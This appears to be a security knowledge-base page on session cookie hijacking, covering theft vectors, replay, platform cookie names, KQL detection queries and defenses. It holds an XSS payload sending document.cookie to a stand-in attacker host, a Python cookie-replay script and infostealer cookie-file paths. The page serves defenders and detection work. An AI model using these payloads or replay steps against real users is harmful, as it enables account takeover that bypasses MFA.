Session Hijacking
ATT&CK: T1539 — Steal Web Session Cookie, T1185 — Browser Session Hijacking
Session hijacking involves stealing authenticated browser cookies and replaying them to impersonate the victim's authenticated session — bypassing both credentials and MFA. As MFA adoption increases, session cookie theft (rather than credential theft) is the dominant initial access vector in BEC and SaaS compromise.
The Core Mechanism
Every time a user authenticates to a web application, the application issues a session cookie:
User authenticates (password + MFA)
↓
Server creates session: session_id = random_value
↓
Cookie set: Set-Cookie: session=<value>; Secure; HttpOnly; SameSite=Strict
↓
Browser sends cookie with every request
↓
Server validates cookie → identifies user
Stealing the cookie = stealing the authenticated session. The server cannot distinguish a legitimate browser from a cookie-replaying attacker.
Theft Vectors
1. Infostealer Malware (Primary Vector)
Infostealers (Raccoon, RedLine, Vidar, Lumma, META) are the dominant cookie theft method:
- Extract cookies from browser databases (
%LocalAppData%\Google\Chrome\User Data\Default\Cookies) - Export to C2 infrastructure
- Logs sold on dark web marketplaces (Russian Market, 2easy, Genesis Market)
Infostealer infection (malvertising, phishing, cracked software)
↓
Extract browser cookies from Chrome/Firefox/Edge profiles
↓
Exfiltrate cookie databases to C2
↓
Sell on dark web marketplace
↓
Buyer imports cookies → authenticated SaaS session
Scale: Genesis Market (seized 2023) had 1.5M+ compromised device logs available for purchase.
2. AiTM (Adversary-in-the-Middle) Phishing
See AiTM Phishing.
Reverse proxy captures cookies in real-time during authentication. The attacker's proxy intercepts the post-MFA session cookie.
3. XSS (Cross-Site Scripting)
If an application has XSS vulnerabilities:
// XSS payload to exfiltrate session cookie
<script>
new Image().src = "https://attacker.com/steal?c=" + document.cookie;
</script>
HttpOnly flag prevents JavaScript access to cookies marked as such — but many apps still have non-HttpOnly cookies.
4. Network Interception (Legacy / Misconfigured)
HTTP (non-HTTPS) traffic allows cookie interception. Rare in modern SaaS but still present in some enterprise internal applications.
Replaying Stolen Cookies
Browser-Based Replay
// Chrome DevTools → Application → Cookies → Edit/Add
// Import cookie values directly into browser
// Navigate to the application → authenticated as victim
Script-Based Replay
import requests
# Stolen cookie
cookies = {
'session': 'stolen_session_value',
'ESTSAUTH': 'm365_session_cookie',
'okta-token-storage': 'okta_session_json'
}
# Access protected resource as victim
r = requests.get('https://myapp.example.com/dashboard', cookies=cookies)
print(r.text)
Chrome Extension / Cookie Editor
Browser extensions (Cookie Editor, EditThisCookie) allow direct import of cookie JSON exports from infostealer logs.
Platform-Specific Session Cookies
| Platform | Cookie Name | Notes |
|---|---|---|
| Microsoft 365 (Entra) | ESTSAUTH, ESTSAUTHPERSISTENT | ESTSAUTHPERSISTENT persists across browser closes |
| Okta | sid, DT | Okta session identifier |
| Google Workspace | GAPS, SSID, HSID | Google auth cookies |
| Salesforce | sid | Salesforce session ID |
| GitHub | user_session, __Host-user_session_same_site | |
| Slack | d=xxxx | Workspace session |
| AWS Console | aws-creds | Console session (not API access) |
Detection
Entra ID — Token Anomalies
// Detect session cookie replay from different IP/device than original auth
SigninLogs
| where RiskEventTypes_V2 has_any ("anonymizedIPAddress", "unfamiliarFeatures", "aiTMAttack")
| project TimeGenerated, UserPrincipalName, IPAddress, RiskLevel, DeviceDetail
// Impossible travel: same session used from different countries
let sessions = SigninLogs
| where ResultType == 0
| project UserPrincipalName, TimeGenerated, IPAddress, Country = LocationDetails.countryOrRegion, CorrelationId;
sessions
| join kind=inner sessions on UserPrincipalName
| where TimeGenerated != TimeGenerated1
| where Country != Country1
| where datetime_diff("minute", TimeGenerated, TimeGenerated1) < 60
| project UserPrincipalName, Country, Country1, TimeGenerated, TimeGenerated1
Endpoint — Infostealer Signals
- Browser process accessing cookie database files (
CookiesSQLite file from unexpected process) - Chrome/Firefox cookie file read by non-browser process
- Network beaconing to known infostealer C2 IPs
- Suspicious child process of browser (Chromium DLL injection)
// Defender for Endpoint — cookie database access from non-browser process
DeviceFileEvents
| where FileName == "Cookies"
| where FolderPath has "Google\\Chrome\\User Data"
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine
Defenses Against Session Hijacking
| Control | Effectiveness |
|---|---|
| Continuous Access Evaluation (CAE) | Revokes tokens mid-session when IP/device changes — effective against replay from different location |
| Conditional Access: Compliant Device | Session from non-compliant device is rejected even with valid cookie |
| Token Binding | Cryptographically binds token to TLS session — theoretically prevents replay; low deployment |
| Short session lifetimes | Stolen cookies expire sooner; limits attack window |
| Infostealer detection on endpoint | EDR detects browser data access by malware |
| HttpOnly + Secure + SameSite=Strict | Mitigates XSS-based theft; does not stop malware |
Cross-Links
| Topic | Link |
|---|---|
| AiTM Phishing | aitm-phishing |
| MFA Technologies | mfa-technologies |
| Entra Identity Protection | identity-protection |
| OAuth App Abuse | oauth-app-abuse |